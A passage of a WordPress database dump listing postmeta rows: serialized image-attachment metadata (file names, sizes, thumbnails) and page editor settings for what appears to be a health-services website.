\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(76,38,'_wp_attached_file','2018/01/cosmetics.jpg'),(77,38,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:21:\"2018/01/cosmetics.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cosmetics-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cosmetics-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"cosmetics-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(78,39,'_wp_attached_file','2018/01/counselling.jpg'),(79,39,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:719;s:4:\"file\";s:23:\"2018/01/counselling.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"counselling-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"counselling-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"counselling-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(80,40,'_wp_attached_file','2018/01/crooked-before-and-after.png'),(81,40,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:371;s:6:\"height\";i:122;s:4:\"file\";s:36:\"2018/01/crooked-before-and-after.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"crooked-before-and-after-150x122.png\";s:5:\"width\";i:150;s:6:\"height\";i:122;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"crooked-before-and-after-300x99.png\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(82,41,'_wp_attached_file','2018/01/dentist.jpg'),(83,41,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:19:\"2018/01/dentist.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"dentist-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"dentist-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"dentist-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 40D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(84,42,'_wp_attached_file','2018/01/dentist-chair.jpg'),(85,42,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2018/01/dentist-chair.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"dentist-chair-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"dentist-chair-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"dentist-chair-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(86,43,'_wp_attached_file','2018/01/disabled.jpg'),(87,43,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2018/01/disabled.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"disabled-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"disabled-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"disabled-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(88,44,'_wp_attached_file','2018/01/discoloured.png'),(89,44,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:379;s:6:\"height\";i:121;s:4:\"file\";s:23:\"2018/01/discoloured.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"discoloured-150x121.png\";s:5:\"width\";i:150;s:6:\"height\";i:121;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"discoloured-300x96.png\";s:5:\"width\";i:300;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90,45,'_wp_attached_file','2018/01/divorce2.jpg'),(91,45,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:20:\"2018/01/divorce2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"divorce2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"divorce2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"divorce2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"divorce2-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(92,46,'_wp_attached_file','2018/01/doctor-jackrt.jpg'),(93,46,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2018/01/doctor-jackrt.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"doctor-jackrt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"doctor-jackrt-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"doctor-jackrt-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94,47,'_wp_attached_file','2018/01/doctor.jpg'),(95,47,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:18:\"2018/01/doctor.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"doctor-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"doctor-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"doctor-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(96,48,'_wp_attached_file','2018/01/doctors-tools-black-and-white.jpg'),(97,48,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:41:\"2018/01/doctors-tools-black-and-white.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"doctors-tools-black-and-white-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"doctors-tools-black-and-white-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"doctors-tools-black-and-white-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(98,49,'_wp_attached_file','2018/01/domestic-building.jpg'),(99,49,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:29:\"2018/01/domestic-building.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"domestic-building-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"domestic-building-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"domestic-building-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(100,20,'_thumbnail_id','44'),(101,51,'_wp_attached_file','2018/01/exercise.jpg'),(102,51,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:958;s:6:\"height\";i:636;s:4:\"file\";s:20:\"2018/01/exercise.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"exercise-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"exercise-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"exercise-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(103,52,'_wp_attached_file','2018/01/fitness-class.jpg'),(104,52,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:532;s:4:\"file\";s:25:\"2018/01/fitness-class.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"fitness-class-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"fitness-class-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"fitness-class-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(135,72,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(136,72,'_edit_last','1'),(137,72,'_wp_page_template','default'),(138,72,'_wpb_vc_js_status','false'),(139,72,'_edit_lock','1517299435:1'),(140,74,'_wp_attached_file','2018/01/from-55-41.gif'),(141,74,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:227;s:6:\"height\";i:235;s:4:\"file\";s:22:\"2018/01/from-55-41.gif\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"from-55-41-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:22:\"from-55-41-227x145.gif\";s:5:\"width\";i:227;s:6:\"height\";i:145;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(149,77,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(150,77,'_edit_last','1'),(151,77,'_edit_lock','1541508031:1'),(152,78,'_wp_attached_file','2018/01/coffee-and-ipad.jpg'),(153,78,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:27:\"2018/01/coffee-and-ipad.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"coffee-and-ipad-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"coffee-and-ipad-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"coffee-and-ipad-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:27:\"coffee-and-ipad-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(154,77,'_thumbnail_id','78'),(157,80,'_wp_attached_file','2018/01/dentist-Copy.jpg'),(158,80,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2018/01/dentist-Copy.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"dentist-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"dentist-Copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"dentist-Copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:24:\"dentist-Copy-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 40D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(159,81,'_wp_attached_file','2018/01/dentist-chair-Copy.jpg'),(160,81,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:30:\"2018/01/dentist-chair-Copy.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"dentist-chair-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"dentist-chair-Copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"dentist-chair-Copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:30:\"dentist-chair-Copy-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(161,82,'_wp_attached_file','2018/01/medic-Copy.jpg'),(162,82,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2018/01/medic-Copy.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"medic-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"medic-Copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"medic-Copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:22:\"medic-Copy-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(163,83,'_wp_attached_file','2018/01/morning-sickness-Copy.jpg'),(164,83,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:33:\"2018/01/morning-sickness-Copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"morning-sickness-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"morning-sickness-Copy-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"morning-sickness-Copy-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"morning-sickness-Copy-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:33:\"morning-sickness-Copy-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165,84,'_wp_attached_file','2018/01/optician-Copy.jpg'),(166,84,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:25:\"2018/01/optician-Copy.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"optician-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"optician-Copy-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"optician-Copy-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:25:\"optician-Copy-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/j